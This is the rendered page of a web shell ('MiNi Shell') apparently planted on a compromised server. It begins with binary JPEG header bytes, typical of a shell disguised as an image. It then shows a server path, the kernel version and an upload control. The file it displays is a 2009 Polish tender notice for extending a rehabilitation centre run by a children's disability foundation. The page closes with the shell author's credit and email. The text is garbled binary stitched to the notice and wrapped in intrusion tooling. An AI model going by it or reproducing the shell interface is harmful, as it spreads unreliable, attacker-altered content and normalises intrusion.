JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090227/44346-N-2009.html

<p class="kh_header"><b>Miechucino: Rozbudowa istniejącego Ośrodka Rewalidacyjno-Wychowawczego Szklana gm. Sierakowice , działka nr 10/6</b><br>
<b>Numer ogłoszenia: 44346 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Pomocy Dzieciom Niepełnosprawnym UŚMIECH DZIECKA , ul. Szklana 44, 83-334 Miechucino, woj. pomorskie, tel. 058 6847766, faks 058 6847766.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.usmiechdziecka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Organizacja Pożytku Publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa istniejącego Ośrodka Rewalidacyjno-Wychowawczego Szklana gm. Sierakowice , działka nr 10/6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Przedmiotem zamówienia jest rozbudowa istniejącego Ośrodka Rewalidacyjno-Wychowawczego w Szklanej gm. Sierakowice. Budynek częściowo podpiwniczony, 1- kondygnacyjny. Powierzchnia projektowanej zabudowy 350,3m2, kubatura 1611,70m3, powierzchnia użytkowa 442,20m2. 
Szczegółowy zakres prac należy wykonać zgodnie z projektem stanowiącym załącznik do SIWZ. Projekt techniczny jest dostępny na stronie internetowej Zamawiającego tj. www.usmiechdziecka.com.pl oraz w siedzibie Zamawiającego - po uprzednim pisemnym jej zamówieniu.

1.Branża budowlana
a) konstrukcja obiektu tradycyjna,
b) ściany nośne murowane z gazobetonu,
c) strop nad częścią podpiwniczoną żelbetowy,
d) więźba dachowa drewniana krokwiowo-płatwiowa, kryta blachą trapezową, rynny, rury spustowe z blachy powlekanej,
e) stolarka okienna i drzwiowa zewnętrzna z profili PCV pięciokomorowych z nawiewnikami, parapety zewnętrzne z blachy powlekanej,
f) elewacja - ocieplenie styropianem gr. 10cm , tynk mineralny baranek gr. 2mm malowany farbą elewacyjną silikonowo-silikatową, na cokole płytki klinkierowe,
g) zagospodarowanie terenu - z kostki polbruk.

2.Branża elektryczna
a) instalacje elektryczne wewnętrzne wg projektu budowlanego.

3.Branża sanitarna
a) instalacje wewnętrzne wod-kan wg projektu budowlanego,
b) instalacja co wg projektu budowlanego,
c) źródło ciepła kocioł na paliowo stałe z podajnikiem o mocy 50 kW,
d) przyłącza kanalizacji sanitarnej z rur PCV.

UWAGA :  zakres przetargu nie obejmuje robót ziemnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.52.21-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wartośc wadium wynosi : 45 000,00 zł (słownie: czterdzieści pięć tysięcy zł)
2.Wadium może być wnoszone w jednej lub kilku następujących formach :
1) pieniądzu - przelewem na rachunek bankowy zamawiającego Nr 95 8324 0001 0000 1368 2000 0010. Wadium wniesione w pieniądzu winno znaleźć się na rachunku zamawiającego do dnia 20 marca 2009r. Potwierdzona za zgodność z oryginałem kserokopia dowodu wpłaty potwierdzająca terminowe dokonanie wpłaty wadium - musi być dołączona do oferty,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym - dokument należy dostarczyć do siedziby Zamawiającego do dnia 20 marca 2009r.
3) gwarancjach bankowych - dokument należy dostarczyć do siedziby Zamawiającego do dnia 20 marca 2009r.,
4) gwarancjach ubezpieczeniowych - dokument należy dostarczyć do siedziby Zamawiającego do dnia 20 marca 2009r.,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. Nr 109, poz. 1158 z późn.zmianami) - dokument należy dostarczyć do siedziby Zamawiającego do dnia 20 marca 2009r..
3. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
4. Zwrot lub zatrzymanie wadium nastąpi zgodnie z art. 46 ustawy Pzp, w tym m.in.:
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do złożenia dokumentów, oświadczeń lub pełnomocnictw potwierdzających spełnianie warunków udziału w postępowaniu lub wymagań określonych przez zamawiającego dla przedmiotu zamówienia, nie złożył tych dokumentów.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają wymagania określone w art. 22 ust. 1 Pzp.:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.
- wykażą wykonanie w ciągu ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum trzech robót budowlanych obiektów kubaturowych budownictwa ogólnego każdy o kubaturze minimum 2000m3 i wartości  min. 3 mln zł netto, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia,
- dysponują kierownikiem budowy i kierownikami robót posiadającymi odpowiednie uprawnienia,
3) znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia:
- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum  1.500.000,00zł.
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, tj.
- spełniają wymagania określone w art. 24 ust. 1 i 2..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; ( rozdział V pkt 1 ppkt 1 i 4):
a) Oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp na formularzu oświadczenia stanowiącym załącznik nr 2.
b) Oświadczenie wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 złożone na załączniku nr 3
c) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
d) Oświadczenie Wykonawcy lub aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e) Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem składek na ubezpieczenie społeczne, , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - zaświadczenie powinno zawierać informację o liczbie etatów, od których Wykonawca odprowadza składki - spełnieniem wymogów specyfikacji będzie opłacanie składek od minimum 30 etatów.
2. W zakresie posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj. ( rozdz. V. pkt 1 ppt 2):
a) Wykaz  wykonanych w ciągu ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum trzech robót budowlanych obiektów kubaturowych budownictwa ogólnego każdy o kubaturze minimum 2000m3 i wartości  min. 3 mln zł netto, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia załącznik nr 4;
b) Dokumenty potwierdzające, że roboty o których mowa wyżej zostały wykonane należycie (referencje). Dokumenty muszą dotyczyć pozycji ujętych w załączniku nr 4.

c) Wykaz osób ( kadry technicznej - kierownik budowy, kierownicy robót sanitarnych i elektrycznych), którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności; załącznik nr 5;

d) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej, Wykonawca wykazał osoby, którymi będzie dysponował ; załącznik nr 6

e) Kserokopie uprawnień budowlanych i ważnych zaświadczeń o przynależności do Izby Inżynierów Budownictwa osób wskazanych w pkt c).

3. W zakresie znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, ( rozdz.V. pkt 1 ppkt 3):
a) Przedstawienie polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 1.500.000,00 zł.
b) Opinia Bankowa informująca o zdolności kredytowej Wykonawcy na kwotę nie mniejszą niż 3 mln zł, lub o posiadaniu przez Wykonawcę środków pieniężnych na koncie w kwocie nie mniejszej niż 3 mln zł.
c) Bilans i Rachunek Zysków i Strat za ostanie 3 lata, potwierdzające, że Wykonawca osiągnął przychody z działalności budowlanej w latach 2005, 2006, 2007 na poziomie nie mniejszym niż 5 mln zł rocznie.

B. Inne wymagane dokumenty:
a) Wypełniony formularz oferty załącznik nr 1
b) Wadium w wysokości określonej przez Zamawiającego i formie zgodnej z ustawą Pzp - wpłacone na konto Zamawiającego lub wniesione do siedziby Zamawiającego w oryginale w przypadku dokumentu wadialnego innego niż pieniądz.
c) Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w formie oryginału lub potwierdzonej notarialnie kopii, o ile nie wynika ono z innych załączonych do oferty dokumentów.
d) Oświadczenie o udzieleniu rękojmi i gwarancji na wykonany przedmiot zamówienia na nie mniej niż 3 lata.
e) Wykaz tych części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom (załącznik nr 5).
f) Kosztorys ofertowy szczegółowy.

C. Wszystkie wymagane dokumenty przedstawia się w formie oryginału lub w formie kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.

D. Wykonawcy występujący wspólnie
W przypadku składania wspólnej oferty przez dwóch lub więcej Wykonawców każdy z Wykonawców w swoim imieniu złoży dokumenty wymienione w pkt. A ppkt 1 lit. a),b),c),d),e) i pkt. B ppkt. c).

Pozostałe dokumenty są wspólne dla wszystkich występujących wspólnie Wykonawców.
Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Pełnomocnictwo winno być podpisane przez upełnomocnionych przedstawicieli wszystkich pozostałych Wykonawców i załączone do oferty.

E. Wykonawcy mający siedzibę poza terytorium Rzeczpospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, których mowa w pkt. A ppkt 1 lit. d),e),f) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
Dokumenty składane przez wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium rzeczpospolitej Polskiej winny być zgodne z Rozporządzeniem prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 87 poz.605 ze zmianami).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.usmiechdziecka.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Projekt techniczny jest dostępny na stronie internetowej Zamawiającego tj. www.usmiechdziecka.com.pl oraz w siedzibie Zamawiającego - po uprzednim pisemnym jej zamówieniu..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 10:45, miejsce: Ośrodek Rewalidacyjno-Wychowawczym 
Szklana 1
83-334 Miechucino.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany przez następujące podmioty:
1. Fundacja Pomocy Dzieciom Niepełnosprawnym Uśmiech Dziecka, 
Szklana 44, 83-334 Miechucino
2. Urząd Marszałkowski Województwa Pomorskiego, ul. Okopowa 21/27, 80-810 Gdańsk

Creat By MiNi SheLL
Email: jattceo@gmail.com